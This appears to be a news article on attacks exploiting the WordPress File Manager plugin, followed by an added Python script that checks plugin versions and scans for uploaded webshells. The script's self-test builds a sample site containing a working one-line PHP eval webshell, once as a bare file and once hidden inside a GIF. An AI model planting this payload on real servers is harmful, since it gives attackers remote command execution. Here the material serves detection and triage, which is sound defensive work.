WordPress websites are under active attack through a vulnerability in one of the plugins commonly used to build them.
The plugin, File Manager, is installed on more than 700,000 websites. Web developers use it to manage the files they work with while building a WordPress site.
File Manager bundles elFinder, an open-source file-manager library. The vulnerability being exploited is not in elFinder as such but in the way File Manager integrates it into its own functionality.
What this could mean for your WordPress website
Normally, what a person can see or change on a site is governed by login credentials and user roles. Through the flawed File Manager plugin, attackers can bypass that and upload files to the site without logging in. The files seen in these attacks are images with webshells hidden inside them.
A webshell lets the attacker run commands on the server from the directory the File Manager plugin uses to store files. Files that attackers have tried to plant on sites include hardfork.php, hardfind.php and x.php.
The website security firm Wordfence reports having already blocked some 450,000 attempts of this kind.
Once inside, attackers can escalate their privileges, modify the site's existing files or upload new ones. Those files can carry anything from lewd images to content unrelated to what the site offers its audience, or code that steals stored data.
According to Chloe Chamberland, a threat analyst at Wordfence, “a file manager plugin like this would make it possible for an attacker to manipulate or upload any files of their choosing directly from the WordPress dashboard, potentially allowing them to escalate privileges once in the site’s admin area.”
“For example, an attacker could gain access to the admin area of the site using a compromised password, then access this plugin and upload a webshell to do further enumeration of the server and potentially escalate their attack using another exploit.”
How to prevent your site from being attacked
The vulnerability affects File Manager versions 6.0 through 6.8. A fixed release is available.
Update the plugin to version 6.9 now; if you are not sure how, your site's developer can do it. Updating closes the hole but does not remove anything an attacker already uploaded, so a site that ran a vulnerable version while these attacks were under way should also be checked for unexpected PHP files in the plugin's directory.
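As an added example (not code from the article, from Wordfence or from the plugin's authors), the following Python script does the two checks a practitioner would want after reading the above: it reads the installed File Manager version and flags anything in the 6.0 to 6.8 range named in the article, and it scans the plugin's file-storage directory for PHP files, for the file names reported in the attacks (hardfork.php, hardfind.php, x.php) and for image files that contain a PHP open tag, which is how a webshell is hidden inside an image. The plugin path wp-content/plugins/wp-file-manager, the main file file_folder_manager.php and the storage directory lib/files are assumptions; the sample site the script builds in a temporary directory is constructed test data, not a real compromise.

```python
"""Triage for the File Manager plugin issue described above.

Added example, not code from the article, Wordfence or the plugin's authors.
Assumptions (not stated in the article):
  * the plugin lives at wp-content/plugins/wp-file-manager/ and declares its
    version in the standard WordPress header of file_folder_manager.php;
  * files handled by the plugin are stored under that plugin's lib/files/.
"""
from __future__ import annotations

import re
import tempfile
from dataclasses import dataclass, field
from pathlib import Path

PLUGIN_REL = Path("wp-content/plugins/wp-file-manager")   # assumed plugin path
MAIN_FILE = "file_folder_manager.php"                      # assumed main plugin file
UPLOAD_DIR = Path("lib/files")                             # assumed storage directory
VULNERABLE_RANGE = ("6.0", "6.8")                          # affected versions, per the article
KNOWN_NAMES = {"hardfork.php", "hardfind.php", "x.php"}    # names reported in the article
PHP_EXTS = {".php", ".phtml", ".php5", ".phar"}
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".webp"}
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)
VERSION_HEADER = re.compile(r"^\s*\*?\s*Version:\s*([0-9][0-9.]*)", re.MULTILINE)


def parse_version(version: str) -> tuple[int, ...]:
    """'6.8' -> (6, 8); tuples compare correctly where plain strings would not."""
    return tuple(int(part) for part in version.split("."))


def read_plugin_version(wp_root: Path) -> str | None:
    """Read the Version: line of the plugin header, or None if the plugin is absent."""
    main = wp_root / PLUGIN_REL / MAIN_FILE
    if not main.is_file():
        return None
    match = VERSION_HEADER.search(main.read_text(errors="replace"))
    return match.group(1) if match else None


def is_vulnerable_version(version: str | None) -> bool:
    if version is None:
        return False
    low, high = (parse_version(v) for v in VULNERABLE_RANGE)
    return low <= parse_version(version) <= high


@dataclass
class Findings:
    version: str | None
    vulnerable_version: bool
    php_in_upload_dir: list[str] = field(default_factory=list)   # any PHP where only data belongs
    known_webshell_names: list[str] = field(default_factory=list)  # names from the attacks
    php_inside_images: list[str] = field(default_factory=list)     # image extension, PHP payload


def scan(wp_root: Path) -> Findings:
    """Version check plus a sweep of the plugin's storage directory."""
    version = read_plugin_version(wp_root)
    findings = Findings(version=version, vulnerable_version=is_vulnerable_version(version))
    upload_dir = wp_root / PLUGIN_REL / UPLOAD_DIR
    if not upload_dir.is_dir():
        return findings
    for path in sorted(upload_dir.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(wp_root).as_posix()
        ext = path.suffix.lower()
        if ext in PHP_EXTS:
            findings.php_in_upload_dir.append(rel)
            if path.name in KNOWN_NAMES:
                findings.known_webshell_names.append(rel)
        elif ext in IMAGE_EXTS and PHP_OPEN_TAG.search(path.read_bytes()):
            findings.php_inside_images.append(rel)  # polyglot: image header, PHP body
    return findings


def build_sample_site(base: Path) -> Path:
    """Constructed sample, not real data: a 6.8 install with two planted files and one clean one."""
    plugin = base / PLUGIN_REL
    uploads = plugin / UPLOAD_DIR
    uploads.mkdir(parents=True)
    (plugin / MAIN_FILE).write_text("<?php\n/*\nPlugin Name: File Manager\nVersion: 6.8\n*/\n")
    (uploads / "hardfork.php").write_bytes(b'<?php @eval($_POST["x"]); ?>')   # bare webshell
    (uploads / "logo.gif").write_bytes(b"GIF89a" + b"\x00" * 16 + b'<?php @eval($_POST["x"]); ?>')
    (uploads / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b"\x00" * 32)   # clean image
    return base


def demo() -> Findings:
    """Build the constructed sample in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan(build_sample_site(Path(tmp)))


if __name__ == "__main__":
    print(demo())
```

Against a real install, call `scan(Path("/var/www/html"))` (or wherever the WordPress root is). A hit is a lead, not proof: a PHP file in the storage directory, a known name, or an image with a PHP open tag each deserves a look, and anything that turns out to be malicious should be copied off for analysis before it is deleted, since the file itself is the best evidence of when and how the site was entered.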